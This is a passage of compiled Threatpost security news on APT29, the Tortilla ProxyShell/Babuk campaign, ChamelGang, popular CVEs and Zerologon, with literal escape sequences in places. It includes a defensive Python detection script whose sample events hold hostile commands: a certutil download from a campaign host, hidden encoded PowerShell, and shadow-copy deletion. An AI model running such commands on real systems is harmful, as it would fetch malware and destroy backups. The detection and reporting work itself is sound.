The exploits in rotation include the recent [Citrix code-injection bug](<https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/>) (CVE-2019-19781); a publicized [Pulse Secure VPN flaw](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) (CVE-2019-11510); and issues in FortiGate (CVE-2018-13379) and Zimbra (CVE-2019-9670).\n\n\u201cThe group conducted basic vulnerability scanning against specific external IP addresses owned by the [targeted] organizations,\u201d according to the report. \u201cThe group then deployed public exploits against the vulnerable services identified. The group has been successful using recently published exploits to gain initial footholds.\u201d\n\nOnce a system is compromised, the group then looks to obtain additional authentication credentials to allow further access and spread laterally.\n\n## **Custom Malware**\n\nOnce established in a network, APT29 is employing homegrown malware that the NCSC is calling WellMess and WellMail, to conduct further operations on the victim\u2019s system and exfiltrate data.\n\nWellMess, first discovered in July 2018, is malware that comes in Golang or .NET versions and supports HTTP, TLS and DNS for communications.\n\nNamed after one of the function names in the malware, \u201cWellMess is a lightweight malware designed to execute arbitrary shell commands, upload and download files,\u201d according to the advisory.\n\nWellMail malware meanwhile, named after file paths containing the word \u2018mail\u2019 and the use of server port 25, is also lightweight \u2013 and is designed to run commands or scripts while communicating with a hardcoded command-and-control (C2) server.\n\n\u201cThe binary is an ELF utility written in Golang which receives a command or script to be run through the Linux shell,\u201d according to the NCSC. 
\u201cTo our knowledge, WellMail has not been previously named in the public domain.\u201d\n\nBoth malware families use hard-coded client and certificate authority TLS certificates to communicate with their C2 servers.\n\n\u201cWellMess and WellMail samples contained TLS certificates with the hard-coded subjectKeyIdentifier (SKI) \u20180102030406\u2019, and used the subjects \u2018C=Tunis, O=IT\u2019 and \u2018O=GMO GlobalSign, Inc\u2019 respectively,\u201d detailed the report. \u201cThese certificates can be used to identify further malware samples and infrastructure. Servers with this GlobalSign certificate subject may be used for other functions in addition to WellMail malware communications.\u201d\n\nAPT29 is also using another malware, dubbed \u2018SoreFang\u2019 by the NCSC, which is a first-stage downloader that uses HTTP to exfiltrate victim information and download second-stage malware. It\u2019s using the same C2 infrastructure as a WellMess sample, the agencies concluded.\n\nThis sample is not a custom job: \u201cIt is likely that SoreFang targets SangFor devices. Industry reporting indicates that other actors, reportedly including [DarkHotel](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>), have also targeted SangFor devices,\u201d noted the NCSC.\n\n## **APT29: A Sporadically High-Profile Threat**\n\n[APT29](<https://attack.mitre.org/groups/G0016/>) has long been seen targeting high-value targets across the think-tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government and defense contracting sectors.\n\nThe group is perhaps best-known for the [intrusion](<https://threatpost.com/dnc-hacked-research-on-trump-stolen/118656/>) at the Democratic National Committee ahead of the U.S. presidential election in 2016. 
It was also implicated in [a widespread phishing campaign](<https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/>) in November 2016, in attacks against the White House, State Department and Joint Chiefs of Staff.

It was next seen in November 2017 [executing a Tor backdoor](<https://threatpost.com/apt29-used-domain-fronting-tor-to-execute-backdoor/124582/>), and then [it reemerged](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) in 2018 with a widespread espionage campaign against military, media and public-sector targets.

Its history stretches back further, though: it [was also seen](<https://threatpost.com/white-house-state-department-counted-among-cozyduke-apt-victims/112382/>) by Kaspersky Lab carrying out data-mining attacks against the White House and the Department of State in 2014.

Researchers from firms [like Mandiant](<https://www.fireeye.com/current-threats/apt-groups/rpt-apt29.html>) believe APT29 to be linked to Russian government-backed operations – an assessment that the DHS and NCSC reiterated in the latest advisory, saying that it is “almost certainly part of the Russian intelligence services.”

While its publicly profiled activity tends to be sporadic, APT29 is rarely at rest, according to Mandiant’s Hultquist.

“Despite involvement in several high-profile incidents, APT29 rarely receives the same attention as other Russian actors because they tend to quietly focus on intelligence collection,” he said via email.
“Whereas GRU actors have brazenly leaked documents and carried out destructive attacks, APT29 digs in for the long term, siphoning intelligence away from its target.”

This latest case is no exception to that M.O., according to the advisory: “APT29 is likely to continue to target organizations involved in COVID-19 vaccine research and development, as they seek to answer additional intelligence questions relating to the pandemic,” the agencies concluded.

That said, at least one researcher warned that the end-game of the activity might be more nefarious than simply getting a leg up on a cure.

“APT29 (Cozy Bear, Office Monkeys) has successfully demonstrated the extension of nation-state power through cyber-action for more than a dozen years,” Michael Daly, CTO at Raytheon Intelligence & Space, said via email. “However, they are not focused on simple intellectual property theft. Instead, their focus is rooted in influence operations – the changing of hearts and minds to thwart and diminish the power of governments and organizations.”

He added, “In the case of this breach of vaccine research centers, we should be most concerned not that someone else might also get a vaccine, but that the information will be used to undermine the confidence of the public in the safety or efficacy of the vaccines, slowing their adoption, or in some way cause their release to be delayed.
The effect of such a delay would be both impactful to the health of Western populations, but also to the social stability and economic stability of the West.”

*Source: Threatpost, “Hackers Look to Steal COVID-19 Vaccine Research”, published 2020-07-16, <https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/>. CVEs referenced: CVE-2018-13379, CVE-2019-11510, CVE-2019-19781, CVE-2019-9670. CVSS v2 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P).*

## ‘Tortilla’ Wraps Exchange Servers in ProxyShell Attacks (Threatpost, 2021-11-03)

A new-ish threat actor sometimes known as “Tortilla” is launching a fresh round of ProxyShell attacks on Microsoft Exchange servers, this time with the aim of infecting vulnerable servers with variants of the Babuk ransomware.

Cisco Talos researchers said in a Wednesday [report](<https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) that they spotted the malicious campaign a few weeks ago, on Oct. 12.

Tortilla, an actor that’s been operating since July, is predominantly targeting U.S. victims. It’s also responsible for a smaller number of infections that have hit machines in Brazil, Finland, Germany, Honduras, Thailand, Ukraine and the U.K., as shown on the map below.

![Victim distribution map](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/03120718/ProxShell-Babuk-map-e1635955653968.jpeg>)

Victim distribution map.
Source: Cisco Talos.

Prior to this ransomware-inflicting campaign, Tortilla had been experimenting with other payloads, such as the PowerShell-based netcat clone PowerCat.

PowerCat has a penchant for Windows, the researchers explained, being “known to provide attackers with unauthorized access to Windows machines.”

## ProxyShell’s New Attack Surface

ProxyShell is the name given to an attack that chains three vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) to give unauthenticated attackers remote code execution (RCE) on the server and a route to plaintext passwords.

The attack was outlined in a presentation ([PDF](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>)) given by Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) at Black Hat USA in August 2021 (the chain had first been demonstrated at Pwn2Own that April). In it, Tsai disclosed an entirely new attack surface in Exchange, and a [barrage](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) of [attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) soon followed.
August was glutted with reports of threat actors exploiting ProxyShell to launch [webshell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as well as to deliver [LockFile ransomware](<https://pbs.twimg.com/media/E9TmPo6XMAYCnO-?format=jpg&name=4096x4096>).

In this latest ProxyShell campaign, Cisco Talos researchers said that the threat actor is using “a somewhat unusual infection chain technique where an intermediate unpacking module is hosted on a pastebin.com clone pastebin.pl” to deliver Babuk.

They continued: “The intermediate unpacking stage is downloaded and decoded in memory before the final payload embedded within the original sample is decrypted and executed.”

## Who’s Babuk?

Babuk is a ransomware that’s probably best known for its starring role in a breach of the Washington D.C. police force [in April](<https://threatpost.com/babuk-ransomware-washington-dc-police/165616/>). The gang behind the malware has a short history, having only been [identified in 2021](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/babuk-ransomware/>), but that history shows that it’s a [double-extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) player: one that threatens to post stolen data in addition to encrypting files, as a way of applying thumbscrews so victims will pay up.

That tactic has worked.
As [McAfee](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/babuk-ransomware/>) described in February, Babuk had already been lobbed at a batch of at least five big enterprises, with one score: the gang walked away with $85,000 after one of those targets ponied up the money, McAfee researchers said.

Its victims have included Serco, an outsourcing firm that confirmed that it had been [slammed](<https://www.computerweekly.com/news/252495684/Serco-confirms-Babuk-ransomware-attack>) with a double-extortion ransomware attack in late January.

Like many ransomware strains, Babuk is ruthless: it not only encrypts a victim’s machine, it also [blows up backups](<https://threatpost.com/conti-ransomware-backups/175114/>) and deletes the volume shadow copies, Cisco Talos said.

## What’s Under Babuk’s Hood

On the technical side, Cisco Talos described Babuk as a flexible ransomware that can be compiled, through a ransomware builder, for several hardware and software platforms.

It’s mostly compiled for Windows and for ARM Linux, but researchers said that, over time, they’ve also seen versions for ESX and a 32-bit, old PE executable.

In this recent October campaign, though, the threat actors are specifically targeting Windows.

## China Chopper Chops Again

Part of the infection chain involves China Chopper: a webshell that dates back to 2010 but which has [clung to relevancy since](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>), including reportedly being used in a massive 2019 attack against telecommunications providers called [Operation Soft Cell](<https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers>).
The webshell enables attackers to “retain access to an infected system using a client-side application which contains all the logic required to control the target,” as Cisco Talos [described](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>) the webshell in 2019.

This time around, it’s being used to get to Exchange Server systems. “We assess with moderate confidence that the initial infection vector is exploitation of ProxyShell vulnerabilities in Microsoft Exchange Server through the deployment of China Chopper web shell,” according to the Cisco Talos writeup.

## The Infection Chain

As shown in the infection flow chart below, the actors are using either a DLL or .NET executable to kick things off on the targeted system. “The initial .NET executable module runs as a child process of w3wp.exe and invokes the command shell to run an obfuscated PowerShell command,” according to Cisco Talos’ report.

![Infection flow chart](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/03130541/infection-flow-chart-e1635959155173.jpeg>)

Infection flow chart. Source: Cisco Talos.

“The PowerShell command invokes a web request and downloads the payload loader module using certutil.exe from a URL hosted on the domains fbi[.]fund and xxxs[.]info, or the IP address 185[.]219[.]52[.]229,” researchers said.

“The payload loader downloads an intermediate unpacking stage from the PasteBin clone site pastebin.pl,” they continued – a site that “seems to be unrelated to the popular pastebin.com.”

They continued: “The unpacker concatenates the bitmap images embedded in the resource section of the trojan and decrypts the payload into the memory.
The payload is injected into the process AddInProcess32 and is used to encrypt files on the victim’s server and all mounted drives.”

## More Ingredients in Tortilla’s Infrastructure

Besides the pastebin.pl site that hosts Tortilla’s intermediate unpacker code, Tortilla’s infrastructure also includes a Unix-based download server.

The site is legitimate, but Cisco Talos has seen multiple malicious campaigns running on it, including hosting variants of the [AgentTesla trojan](<https://threatpost.com/agent-tesla-microsoft-asmi/163581/>) and the [FormBook malware dropper](<https://threatpost.com/new-formbook-dropper-harbors-persistence/145614/>).

## Babuk’s Code Spill Helps Newbies

In July, the Babuk gang’s source code and builder were spilled: they were [uploaded to VirusTotal](<https://threatpost.com/babuk-ransomware-builder-virustotal/167481/>), making them available to all security vendors and competitors. That leak has helped the ransomware spread even to an inexperienced, green group like Tortilla, Cisco Talos said.

The leak “may have encouraged new malicious actors to manipulate and deploy the malware,” researchers noted.

“This actor has only been operating since early July this year and has been experimenting with different payloads, apparently in order to obtain and maintain remote access to the infected systems,” according to its writeup.

With Babuk source code readily available, all the Tortilla actors have to know is how to tweak it a tad, researchers said: a scenario that observers predicted back when the code appeared.

“The actor displays low to medium skills with a decent understanding of the security concepts and the ability to create minor modifications to existing malware and offensive security tools,” Cisco Talos researchers said in assessing the Tortilla gang.

## Decryptor Won’t Work on Variant

While a free [Babuk decryptor was
released](<https://www.bleepingcomputer.com/news/security/babuk-ransomware-decryptor-released-to-recover-files-for-free/>) last week, it won’t work on the Babuk variant seen in this campaign, according to the writeup: “Unfortunately, it is only effective on files encrypted with a number of leaked keys and cannot be used to decrypt files encrypted by the variant described in this blog post.”

## How to Keep Exchange Safe

Tortilla is hosting malicious modules and conducting internet-wide scanning to exploit vulnerable hosts.

The researchers recommended staying vigilant, catching any infection in its early stages and implementing layered defenses, “with the behavioral protection enabled for endpoints and servers to detect the threats at an early stage of the infection chain.”

They also recommended keeping servers and apps updated so as to squash vulnerabilities, such as the trio of CVEs exploited in the ProxyShell attacks.

Also, keep an eye out for backup demolition, as the code deletes shadow copies: “Babuk ransomware is nefarious by its nature and while it encrypts the victim’s machine, it interrupts the system backup process and deletes the volume shadow copies,” according to Cisco Talos.

On top of all that, bolster detection: watch out for system configuration changes, suspicious events generated by detection systems for an abrupt service termination, or abnormally high I/O rates for drives attached to servers, according to Cisco Talos.
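The chain described above (a .NET module running under w3wp.exe that launches the command shell and an obfuscated PowerShell command, which uses certutil.exe to fetch the loader from fbi[.]fund, xxxs[.]info or 185[.]219[.]52[.]229, followed by shadow-copy deletion before encryption) maps cleanly onto process-lineage detection logic, which is the concrete form of the “behavioral protection” the researchers recommend. The following is an added example, not code from Cisco Talos or from the article: a small Python rule set run over constructed process-creation events in the shape a Sysmon Event ID 1 record takes after JSON export (ParentImage, Image, CommandLine, Computer). The event records are made up for the test; only the process names, the IIS worker process and the three hosting indicators come from the article. The certutil `-urlcache` flag and the `vssadmin delete shadows` command line are assumptions about how those tools are usually abused, not something the article states.

```python
"""Process-lineage detections for the Tortilla/Babuk chain (added example).

Event records are constructed to resemble Sysmon Event ID 1 (process creation)
after JSON export; none of them are real log lines.
"""
import re
from typing import Dict, List

# Loader hosting indicators quoted from the Cisco Talos report (defanged as published).
TORTILLA_HOSTS = {"fbi.fund", "xxxs.info", "185.219.52.229"}

WEB_WORKERS = {"w3wp.exe"}                       # IIS worker process hosting Exchange
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Captures the host part of a URL; brackets are allowed so defanged hosts still match.
URL_RE = re.compile(r"https?://([^/\s:]+)", re.IGNORECASE)


def refang(host: str) -> str:
    """Turn 'fbi[.]fund' into 'fbi.fund' so indicators match live command lines."""
    return host.replace("[.]", ".")


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event triggers (empty list = nothing)."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits: List[str] = []

    # Rule 1: the IIS worker spawning a shell, the webshell / Exchange exploitation signature.
    if parent in WEB_WORKERS and image in SHELLS:
        hits.append("web_worker_spawns_shell")

    # Rule 2: certutil used as a downloader (assumed -urlcache usage, not from the article).
    if image == "certutil.exe" and re.search(r"-urlcache", cmd, re.IGNORECASE) and URL_RE.search(cmd):
        hits.append("certutil_download")

    # Rule 3: any command line reaching the campaign's loader hosting infrastructure.
    for m in URL_RE.finditer(cmd):
        host = refang(m.group(1)).lower()
        if host in TORTILLA_HOSTS:
            hits.append("tortilla_loader_host:" + host)

    # Rule 4: shadow-copy deletion ahead of encryption (assumed vssadmin syntax).
    if image == "vssadmin.exe" and re.search(r"delete\s+shadows", cmd, re.IGNORECASE):
        hits.append("shadow_copy_deletion")

    return hits


def triage(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each host to the rules it tripped, in order, for a per-host summary."""
    summary: Dict[str, List[str]] = {}
    for ev in events:
        for hit in evaluate(ev):
            summary.setdefault(ev["Computer"], []).append(hit)
    return summary


# Constructed events; the encoded PowerShell argument is filler, not a real payload.
SAMPLE_EVENTS = [
    {"Computer": "EXCH01", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"Computer": "EXCH01", "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://fbi.fund/loader.bin C:\ProgramData\loader.bin"},
    {"Computer": "EXCH01", "ParentImage": r"C:\ProgramData\loader.exe",
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"Computer": "FS01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verify C:\certs\server.cer"},   # legitimate certutil use
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(rules))
```

Rule 1 is the one worth alerting on by itself on an Exchange server: w3wp.exe has no business starting cmd.exe or PowerShell, whichever of the ProxyShell CVEs or webshells got the attacker there. Rules 2 to 4 are corroboration and will fire on legitimate administration often enough that they belong in a correlation, not a pager.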
*Source: Threatpost, “‘Tortilla’ Wraps Exchange Servers in ProxyShell Attacks”, published 2021-11-03, <https://threatpost.com/tortilla-exchange-servers-proxyshell/175967/>. CVEs referenced: CVE-2021-31207, CVE-2021-34473, CVE-2021-34523, CVE-2021-43267. CVSS v3.1 9.8 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).*

## New APT ChamelGang Targets Russian Energy, Aviation Orgs (Threatpost, 2021-10-01)

A new APT group has emerged that’s specifically targeting the fuel and energy complex and aviation industry in Russia, exploiting known vulnerabilities like Microsoft Exchange Server’s [ProxyShell](<https://threatpost.com/microsoft-barrage-proxyshell-attacks/168943/>) and leveraging both new and existing malware to compromise networks.

Researchers at security firm [Positive Technologies](<https://www.ptsecurity.com/ww-en/>) have been tracking the group, dubbed ChamelGang for its chameleon-like capabilities, since March.
Though the attackers mainly have been seen targeting Russian organizations, they have attacked targets in 10 countries so far, researchers said in a [report](<https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/>) by company researchers Aleksandr Grigorian, Daniil Koloskov, Denis Kuvshinov and Stanislav Rakovsky published online Thursday.

To avoid detection, ChamelGang hides its malware and network infrastructure behind the legitimate services of established companies like Microsoft, TrendMicro, McAfee, IBM and Google in a couple of unique ways, researchers observed.

One is to acquire domains that imitate their legitimate counterparts – such as newtrendmicro.com, centralgoogle.com, microsoft-support.net, cdn-chrome.com and mcafee-upgrade.com. The other is to place SSL certificates that also imitate legitimate ones – such as github.com, www.ibm.com, jquery.com, update.microsoft-support.net – on its servers, researchers said.

Moreover, ChamelGang – like [Nobelium](<https://threatpost.com/solarwinds-active-directory-servers-foggyweb-backdoor/175056/>) and [REvil](<https://threatpost.com/kaseya-patches-zero-days-revil-attacks/167670/>) before it – has hopped on the bandwagon of attacking the supply chain first to gain access to its ultimate target, they said.
In one of the cases analyzed by Positive Technologies, “the group compromised a subsidiary and penetrated the target company’s network through it,” according to the writeup.

The attackers also appear malware-agnostic when it comes to tactics, using both known malicious programs such as [FRP](<https://howtofix.guide/frp-exe-virus/>), [Cobalt Strike Beacon](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) and Tiny Shell, as well as the previously unknown malware ProxyT, BeaconLoader and the DoorMe backdoor, researchers said.

## **Two Separate Attacks**

Researchers analyzed two attacks by the novel APT: one in March and one in August. The first investigation was triggered after a Russia-based energy company’s antivirus protection repeatedly reported the presence of the Cobalt Strike Beacon in RAM.

Attackers gained access to the energy company’s network through the supply chain, compromising a vulnerable version of a subsidiary company’s web application on the JBoss Application Server. Upon investigation, researchers found that attackers exploited a critical vulnerability, [CVE-2017-12149](<https://access.redhat.com/security/cve/CVE-2017-12149>), to remotely execute commands on the host.

Once on the energy company’s network, ChamelGang moved laterally, deploying a number of tools along the way. They included Tiny Shell, a UNIX backdoor with which the attackers can receive a shell from an infected host, execute commands and transfer files; an old DLL-hijacking technique against the Microsoft Distributed Transaction Coordinator (MSDTC) Windows service to gain persistence and escalate privileges; and the Cobalt Strike Beacon for calling back to the attackers for additional commands.

The attackers succeeded in accessing and exfiltrating data, researchers said.
“After collecting the data, they placed it on web servers on the compromised network for further downloading … using the Wget utility,” they wrote.

## **Cutting Short a ProxyShell Attack**

The second attack was on an organization from the Russian aviation production sector, researchers said. They notified the company four days after the server was compromised, working with employees to eliminate the threat shortly after.

“In total, the attackers remained in the victim’s network for eight days,” researchers wrote. “According to our data, the APT group did not expect that its backdoors would be detected so quickly, so it did not have time to develop the attack further.”

In this instance, ChamelGang used a known chain of vulnerabilities in Microsoft Exchange called ProxyShell – CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 – to compromise network nodes and gain a foothold. Indeed, a number of attackers took advantage of ProxyShell throughout August, [pummeling](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) unpatched Exchange servers with attacks after a [researcher at Black Hat revealed](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) the attack surface.

Once on the network, attackers installed a modified version of the DoorMe v2 backdoor on two Microsoft Exchange mail servers on the victim’s network. Attackers also used BeaconLoader to move inside the network and infect nodes, as well as the Cobalt Strike Beacon.

## **Victims Across the Globe**

Further threat intelligence following the investigation into the attacks on the Russian companies revealed that ChamelGang’s activity has not been limited to that country.

Positive Technologies eventually identified 13 more compromised organizations in nine other countries – the U.S., Japan, Turkey, Taiwan, Vietnam, India, Afghanistan, Lithuania and Nepal.
In the last four countries mentioned, attackers targeted government servers, they added.

Attackers often used ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server against victims, who were all notified by the appropriate national security authorities in their respective countries.

ChamelGang’s tendency to reach its targets through the supply chain is also one that it – as well as other APTs – will likely continue, given the success attackers have had so far with this tactic, researchers added. “New APT groups using this method to achieve their goals will appear on stage,” they said.

*Source: Threatpost, “New APT ChamelGang Targets Russian Energy, Aviation Orgs”, published 2021-10-01. CVEs referenced: CVE-2017-12149, CVE-2021-31207, CVE-2021-34473, CVE-2021-34523. CVSS v3.0 9.8 Critical (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).*
*Article URL: <https://threatpost.com/apt-chamelgang-targets-russian-energy-aviation/175272/>*

## Top CVEs Trending with Cybercriminals (Threatpost, 2021-07-16)

Criminal small talk in underground forums offers critical clues about which known Common Vulnerabilities and Exposures (CVEs) threat actors are most focused on. This, in turn, offers defenders clues on what to watch out for.

An analysis of such chatter, by Cognyte, examined 15 [cybercrime forums](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) between Jan. 2020 and March 2021. In its report, researchers highlight which CVEs are the most frequently mentioned and try to determine where attackers might strike next.

“Our findings revealed that there is no 100 percent correlation between the two parameters, since the top five CVEs that received the highest number of posts are not exactly the ones that were mentioned on the highest number of Dark Web forums examined,” the report said. “However, it is still enough to understand which CVEs were popular among threat actors on the Dark Web during the time examined.”

The researchers found [ZeroLogon](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>), [SMBGhost](<https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/>) and [BlueKeep](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) were among the most buzzed-about vulnerabilities among attackers between Jan.
2020 and March 2021.

## **Six CVEs Popular with Criminals**

- [CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) (aka ZeroLogon)
- [CVE-2020-0796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-0796>) (aka SMBGhost)
- [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)
- [CVE-2019-0708](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0708>) (aka BlueKeep)
- [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>)
- [CVE-2017-0199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0199>)

“Most of the CVEs in this list were abused by nation-state groups and cybercriminals, such as ransomware gangs, during worldwide campaigns against different sectors,” the report said.

Notably, all the CVEs threat actors are still focused on are old, meaning that basic patching and mitigation could have stopped many attacks before they even got started.

The report added that the 9-year-old [CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) was exploited by threat actors during the COVID-19 pandemic in 2020, which “indicates that organizations are not patching their systems and are not maintaining a resilient security posture.”

Microsoft has the dubious distinction of being behind five of the six most popular vulns on the Dark Web, Cognyte found. Microsoft has also had a tough time getting users to patch them.

ZeroLogon is a prime example. The [flaw in Microsoft’s software](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) allows threat actors to access domain controllers and breach all Active Directory identity services.
Patching ZeroLogon was so slow that Microsoft announced in January it would start blocking Active Directory domain access for unpatched systems with an “enforcement mode.”

In March 2020, Microsoft patched the number two vulnerability on the list, CVE-2020-0796, but as of October, 100,000 [Windows systems were still vulnerable](<https://threatpost.com/microsofts-smbghost-flaw-108k-windows-systems/160682/>).

The analysts explained that different CVEs were more talked about depending on the forum language. The CVE favored by Russian-language forums was CVE-2019-19781. Chinese forums were buzzing most about CVE-2020-0796. There was a tie between CVE-2020-0688 and CVE-2019-19781 in English-speaking threat-actor circles. And Turkish forums were focused on CVE-2019-6340.

The researchers add, for context, that about half of the monitored forums were Russian-speaking and that Spanish forums aren’t mentioned because there wasn’t a clear frontrunning CVE discussed.

*Source: Threatpost, “Top CVEs Trending with Cybercriminals”, published 2021-07-16, <https://threatpost.com/top-cves-trending-with-cybercriminals/167889/>. CVEs referenced: CVE-2012-0158, CVE-2017-0199, CVE-2017-11882, CVE-2019-0708, CVE-2019-19781, CVE-2019-6340, CVE-2020-0688, CVE-2020-0796, CVE-2020-1472. CVSS v2 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).*

U.S.
government officials have warned that advanced persistent threat actors (APTs) are now leveraging Microsoft’s severe privilege-escalation flaw, dubbed “Zerologon,” to target elections support systems.

Days after [Microsoft sounded the alarm that an Iranian nation-state actor](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) was actively exploiting the flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)), the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory warning of further attacks.

The advisory details how attackers are chaining together various vulnerabilities and exploits – using VPN vulnerabilities to gain initial access and then Zerologon as a post-exploitation method – to compromise government networks.

“This recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal and territorial (SLTT) government networks,” according [to the security advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>). “Although it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.”

With the [U.S.
November presidential elections](<https://threatpost.com/2020-election-secure-vote-tallies-problem/158533/>) around the corner – and cybercriminal activity subsequently ramping up to target [election infrastructure](<https://threatpost.com/black-hat-usa-2020-preview-election-security-covid-disinformation-and-more/157875/>) and [presidential campaigns](<https://threatpost.com/microsoft-cyberattacks-trump-biden-election-campaigns/159143/>) – election security is top of mind. While the CISA and FBI advisory did not detail what type of elections systems were targeted, it did note that there is no evidence to support that the “integrity of elections data has been compromised.”

Microsoft released a patch for the Zerologon vulnerability as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.

Despite a patch being available, many organizations have not yet applied it to their systems – and attackers are taking advantage of that in a recent slew of government-targeted attacks.

CISA and the FBI warned that various APT actors are commonly using [a Fortinet vulnerability](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) to gain initial access to targets. That flaw (CVE-2018-13379) is a path-traversal bug in Fortinet’s FortiOS Secure Socket Layer (SSL) virtual private network (VPN) solution.
While the flaw was patched in April 2019, exploitation details were publicized in August 2019, opening the door for attackers to exploit the error.\n\nOther initial-access vulnerabilities being targeted in the attacks include ones in Citrix NetScaler ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)), MobileIron ([CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)), Pulse Secure ([CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)), Palo Alto Networks ([CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)) and F5 BIG-IP ([CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)).\n\nAfter exploiting an initial flaw, attackers are then leveraging the Zerologon flaw to escalate privileges, the agencies said. They then use legitimate credentials to log in via VPN or remote-access services, in order to maintain persistence.\n\n\u201cThe actors are leveraging CVE-2020-1472 in Windows Netlogon to escalate privileges and obtain access to Windows AD servers,\u201d they said. \u201cActors are also leveraging the open-source tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers.\u201d\n\nThe advisory comes as exploitation attempts against Zerologon spike, after Microsoft recently warned of exploits by an [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which the company calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm). 
